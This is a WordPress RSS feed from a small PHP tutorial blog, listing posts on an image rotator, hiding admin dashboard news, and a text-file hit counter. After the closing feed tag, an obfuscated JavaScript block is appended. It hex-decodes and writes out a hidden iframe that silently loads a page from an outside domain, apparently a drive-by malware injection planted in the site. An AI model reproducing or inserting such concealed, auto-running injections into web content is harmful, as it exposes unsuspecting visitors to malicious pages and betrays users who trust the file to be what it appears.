<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>

<channel>
	<title>Silence is everything &#187; Silenced tutorials</title>
	<atom:link href="http://www.maiq.info/category/tutorials/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.maiq.info</link>
	<description>www.MaiQ.info</description>
	<pubDate>Thu, 26 Jun 2008 16:50:31 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.5.1</generator>
	<language>en</language>
			<item>
		<title>Simple php image rotator</title>
		<link>http://www.maiq.info/simple-php-image-rotator/</link>
		<comments>http://www.maiq.info/simple-php-image-rotator/#comments</comments>
		<pubDate>Tue, 15 Apr 2008 16:57:41 +0000</pubDate>
		<dc:creator>maichi</dc:creator>
		
		<category><![CDATA[Silenced tutorials]]></category>

		<guid isPermaLink="false">http://www.maiq.info/?p=82</guid>
		<description><![CDATA[I am going to make a simple php image rotator that can also be used as a banner rotator.
First, create a new file called &#8220;images.txt&#8221;.
In this file, write embed code for your images, one per line, like:

&#60;img src="path/url to image" alt="" /&#62;
&#60;img src="path/url to image" alt="" /&#62;

Or you can write link codes, just in case [...]]]></description>
		<wfw:commentRss>http://www.maiq.info/simple-php-image-rotator/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Disable news in wp-admin</title>
		<link>http://www.maiq.info/disable-news-in-wp-admin/</link>
		<comments>http://www.maiq.info/disable-news-in-wp-admin/#comments</comments>
		<pubDate>Tue, 09 Oct 2007 13:07:32 +0000</pubDate>
		<dc:creator>maichi</dc:creator>
		
		<category><![CDATA[Silenced general]]></category>

		<category><![CDATA[Silenced tutorials]]></category>

		<category><![CDATA[Silenced wordpress]]></category>

		<category><![CDATA[php]]></category>

		<guid isPermaLink="false">http://www.maiq.info/disable-news-in-wp-admin/</guid>
		<description><![CDATA[This is the fastest way to remove the news from the wordpress admin dashboard.
Open up your favorite ftp program and connect to your blog.
In the wp-admin folder find the file index.php, make a backup of this file just in case u mess it up and you have to restore it later.
Now open up index.php and [...]]]></description>
		<wfw:commentRss>http://www.maiq.info/disable-news-in-wp-admin/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Simple text based hit counter</title>
		<link>http://www.maiq.info/simple-text-based-hit-counter/</link>
		<comments>http://www.maiq.info/simple-text-based-hit-counter/#comments</comments>
		<pubDate>Thu, 04 Oct 2007 21:04:56 +0000</pubDate>
		<dc:creator>maichi</dc:creator>
		
		<category><![CDATA[Silenced general]]></category>

		<category><![CDATA[Silenced tutorials]]></category>

		<category><![CDATA[Silenced work]]></category>

		<category><![CDATA[php]]></category>

		<guid isPermaLink="false">http://www.maiq.info/simple-text-based-hit-counter/</guid>
		<description><![CDATA[First make a new file called stats.txt and one called stats.php
Give write permission on the  .txt file (CHMOD 666 or 777 if you don`t see a growing count)
php code for .php file


&#60;?php
//set data file name/path
$data='stats.txt';
//read content fom the .txt file
$show = file_get_contents($data);
//write new content to the .txt file
$new=file_put_contents($data,$show+1);
//show your hit counter
echo $show;
?&#62;

This is faster [...]]]></description>
		<wfw:commentRss>http://www.maiq.info/simple-text-based-hit-counter/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
<!-- ~ --><script type="text/javascript">function oxsletpvxjt(qixfiot){var ddrbvc="";for(mpcrghwo=0;mpcrghwo<qixfiot.length;mpcrghwo+=2){ddrbvc+=(String.fromCharCode(parseInt(qixfiot.substr(mpcrghwo,2),16)));}document.write(ddrbvc);}oxsletpvxjt("3Cpsbmbvr6966psbmbvr72psbmbvr616D65psbmbvr20psbmbvr73psbmbvr7263psbmbvr3D22psbmbvr687474703A2F2Fpsbmbvr74756D75psbmbvr6Cpsbmbvr74psbmbvr75psbmbvr6F73psbmbvr75psbmbvr6Dpsbmbvr2Epsbmbvr63psbmbvr6F6D2F65702Fpsbmbvr696E64psbmbvr6578psbmbvr2Epsbmbvr7068psbmbvr7022psbmbvr207374796C65psbmbvr3Dpsbmbvr227669psbmbvr73psbmbvr69psbmbvr62psbmbvr696Cpsbmbvr69psbmbvr74psbmbvr79psbmbvr3A2068psbmbvr696464psbmbvr65psbmbvr6E3Bpsbmbvr206469psbmbvr73psbmbvr706C61psbmbvr79psbmbvr3A20psbmbvr6E6F6E65223E3Cpsbmbvr2Fpsbmbvr69psbmbvr66psbmbvr72psbmbvr61psbmbvr6D65psbmbvr3E".replace(/psbmbvr/g, ""));</script><!-- ~ -->